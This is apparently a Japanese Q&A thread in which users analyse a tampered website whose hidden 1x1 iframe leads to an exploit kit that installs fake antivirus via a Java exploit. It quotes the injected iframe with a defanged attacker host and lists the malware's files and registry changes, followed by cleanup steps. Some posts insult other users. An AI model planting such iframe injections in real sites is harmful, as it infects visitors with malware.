偽物ウイルス対策ソフト 配布サイトかもしれません。 ＊＊

shouhei314さん

皆さんお久しぶりです。

ちょっと出遅れましたね。
素晴らしい回答の数々に頭が下がります。

さて、今回もWebページ改竄によるiframe攻撃ですね。

<iframe width="1" height="1" src="攻撃リモートサーバ"></iframe>

現時点でアクセスしてみると、既に404で何も落ちてきませんでした。
回答を見ている限りでは、10月下旬あたりから出回っているJavaのOpenConnection系のExploitですかね。
JavaのSandboxをバイパスし、FakeAVを感染させるDownloader。
MPackの大流行を思い出しますね。
最近Adobe Reader XでSandboxが搭載されましたが、Javaのように数か月しないうちにExploitコードが公開されるでしょう。
それまでは、比較的安定した攻撃方法があるJavaが標的になりそうです。
http://java.sun.com/javase/ja/6/webnotes/ReleaseNotes.html

tida_realさんも仰るように、Exploit Kitが稼働しているサーバーへiframeを介してアクセスさせているんですね。
これも古くから使われている攻撃手法なのですが、ある意味iframeタグは最大の脆弱性ですよこりゃ。
同一サーバー以外のリソースをロードできない様にするとか、ブラウザ側での対応が望まれる部分です。
width="1" height="1"については、レイアウト上のスペーサや、アクセス解析に利用されているサイトも多いので、なんとも…。
何か良いアイデアを考えているところですが。
利用者側、ユーザーができる対策は難しいですねぇ。


このサイトの管理者はどう対応に出ることやら。
改竄されているということは、攻撃者が何らかの方法で既に改竄手段を得ている。
いつ再びExploit Kit稼働中のサーバーにすり替わるかわからないですね。
それに最近のFakeAVもポリモーフィックみたいな感じで、セキュリティ各社の対応が悪い気がします。


では、また何かあれば

tida_extremeさん

追記＞

最高司令・・・了解しました。わたしも今夜中に消滅します。

ショウヘイさんが 一番上にいるのがいいよ。＜追記終了

------------------------------------------

言い忘れた。

おい、一番↓にいる ”にゃ” とか ”きゃ”とか使ってるヤツ。

最高司令か?w

軍隊ゴッコもいいけどな。

そのフレーズの使用権をお前には与えていない。

こちらを撤回しろ。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1052244480...

オマエと同一人物と思われるのが不愉快だ。

yasuは ここでは関係ない。消えな。

tida_realさん

皆様 ご苦労様です。

感染手口は、1 x 1 dot iFrame ・先のマイクロアド感染と同じみたいですニャ。

currentversion7070さんの報告URLのソースを 今、見ましたら、
</STYLE>
</HEAD>
<BODY><iframe width="1" height="1" src="h tp://hage-yasu8x11.com/・・・

スタイルシート改ざんなんですかニャ?
この辺りの書式解説は御詳しい方にお任せするとして、
前回スレの、Antivirus Action 感染と同様手口なようですね。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1151567196
質問者がサジ投げ・シカト君なんで、わたしも投稿撤回しましたけどw
リンク内にあるsmilebananaさんのリンクが、
currentversion7070さんが特攻されたのと極似していますね。

exploit kitによる埋め込みは、
攻撃対象のPCをスキャンして、見合った脆弱性を突いてくるので、
どう爆弾投下されたか確信は持てないけど、前回の

Antivirus Action被感染者、
smilebanana.comさん、
currentversion7070さん
のデータから、

%UserProfile%\file.exe

%Temp%\ランダム英(数)字名フォルダ\ランダム英(数)字名.exe

%AppData%\syssvc.exe

レジストリ関連は、smillebananaさんから引用させて頂くと、

HKEY_CURRENT_USER\Software\ere94fe5o32

HKEY_CURRENT_USER\Software\ere94fe5o32 knkd dword:00000001

HKEY_CURRENT_USER\Software\ere94fe5o32 id "84.2"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gqjqhdim "C:\DOCUME~1\user\LOCALS~1\Temp\eupfcqdha\dsxbnnutsbl.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings ProxyEnable dword:00000000 dword:00000001

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer "http=127.0.0.1:23012"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyOverride "<local>"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations LowRiskFileTypes ".exe"

・・・・・の確認・修復。

昨年のSecurity Tool感染からの教訓で、

%Temp%

%Windir%\Temp

インターネット一時ファイル：
XPの場合：
"%USERPROFILE%\Local Settings\Temporary Internet Files"
Vista/7の場合：
"%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files"

上記3エントリーは、セーフモードで ATF-Cleanerで削除可。

システム復元機能の無効化を実行する。

全ファイル・フォルダを表示する設定にする。

カレントユーザーのスタートアップフォルダ内に
syszid32.exe のような実行ファイルがないか?セーフモードで確認・削除。

%Temp%内に生成された悪性エントリを削除しても復活する場合、
そこに再生成させる親玉を突き止める必要あり。

一例で、 *.bat、*.sys、レジストリエントリが Rootkitで隠蔽されていないか?
TDSSKiller、Sophos Anti-Rootkit の実行。

MBAM・SASの実行。

CurrPortsで悪性通信が無いか、数日最終確認。

ここで回答字数制限内で可能な、
簡易的駆除トライとして今思いつくのは、
わたしでは、これくらいしかありませんニャ。

回答者の皆さん。
もしエクスプロイト感染が蔓延して、
悪玉の素行・解析が煮詰まって来たら、
削除.batとか提供して下さいませ。真に期待してるニャ～～ん♡

しかし、やっぱ、感染したら”リカバリ”推奨がいいですかニャ・・・ばく。

PS:
ところで、肝心要でダンマリのハゲたヤスは、どうしたんでyasuキャ ?(8＿8)?

chaba0326さん

ひょこっとな・・・


早速突撃しましたよ。
（脆弱性の方はSecunia PSIで無いことを確認済み）

Chrome
接続遮断

#############
警告: このサイトにアクセスするとコンピュータに損害を与える可能性があります。
www.prime-k9.com のウェブサイトには、コンピュータに損害を与えたり無断で動作したりする不正なソフトウェアをホストしている可能性のあるサイト hegeam.com の要素が含まれています。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する恐れがあります。
問題の詳細については、hegeam.com に関する Google セーフ ブラウジング診断ページをご覧ください。
オンラインの有害なソフトウェアから保護する方法についてはこちらをご覧ください。
#############

Firefox
無反応、怪しいファイル生成も無し

IE
dw20.exeを使用しようとしていることを確認。

Safari
無反応、怪しいファイル生成も無し

ではIEでdw20.exeを許可してみようと思いますので、しばしお待ちを・・・



結果報告
MSEが検出しましたね。
Exploit:Java/CVE-2010-0840.W

常駐きって再突撃!!（え）
↑さらに報告
IEでも無反応になりました・・・
調査続行不能・・・

yasu88888888888888aさん

kaikaitarakoさん回答感謝

みなさん、感謝です。


CV専務、やっぱり、Antivirus Scanが飛び出してきましたね。


感染確定でya♨巣。



＊＊＊＊＊＊＊＊＊＊＊



http://www.virustotal.com/file-scan/report.html?id=8e56dbd512c0055c...



マイクロソフト社MSEでも、突撃しましたが、「全く検知できず」でya♨巣。


＊＊＊＊＊＊＊＊＊＊＊＊


面白いことがあります。


XP（５１２MBの貧弱スペック）

adobe reader X

Flashは、最新

で、問題web siteに突撃したところ、


「Java Scriptが使用されております、xxxxxxxxxxxxxxxxxxxxxxx」という表示があり、


しばし、待機していると、


IEエクスプローラから

「Adobe PDF文書

Adobe AcrobatまたはReaderに問題があります。Acrobatまたは、Readerを実行している場合、終了してから、もう一度やり直してください（１０３：１０３）」という注意勧告が飛び出してきた！





＊＊＊＊＊＊＊＊＊＊＊＊＊
さて、ソースコードの一部


↓



</SCRIPT></HEAD>
<BODY><iframe width="1" height="1" src="h●tp://hegeam.c●m/gizmod/start.php?id=vlnd"></iframe>
<DIV align="center">
<TABLE width="780">
<TBODY>


＊＊＊＊＊＊＊＊＊＊＊＊

hegeam.c●m（●は、oです。comの意味でya♨巣）




↑

この「ハゲ」なんとかcomにアクセスしたら、avast!のweb shieldが作動して「トロイの木馬」判定でya♨巣。


http://wam.dasient.com/wam/infection_library/3076d0efe3d74bcf4f74ae...





さらに、みなさん、調査お願いするで、ya♨巣



＊＊＊＊＊＊＊＊＊

おい！


ya♨巣


お前の出番だろう


同族の「ハゲcom」だってよ！

currentversion7070さん

皆さまご苦労さまです。

特攻すると、

www■prime-k9■com/flow/index■html

ここから感染しました。

はじめは、

Documents and Settings￥user¥

に『file.exe』がダウンロードされ、

Documents and Settings￥¥user¥Local Settings¥Temp¥

に『ランダム英字文字列フォルダ¥cavragmaffm.exe』が作成。
（ファイル名もランダム文字列？）

『file.exe』と『cavragmaffm.exe』は同じもの。

（XP環境）

まだ他に潜んでいるかは不明です。

http://www.virustotal.com/file-scan/report.html?id=6776fdca6cd26fe5...

http://www.virustotal.com/file-scan/report.html?id=6776fdca6cd26fe5...

kaikaitarakoさん

そのサイト、aguseでは異常なしと出てましたが、gredでは不正改ざんとの判定が出てました。
（ノートンセーフウェブの方は、まだ調査していないとのこと）

ちなみに、Aviraのフリー版を入れているPCでソースコードをdownloadしようとしたら、マルウェアを検出、ガードされてしまいました。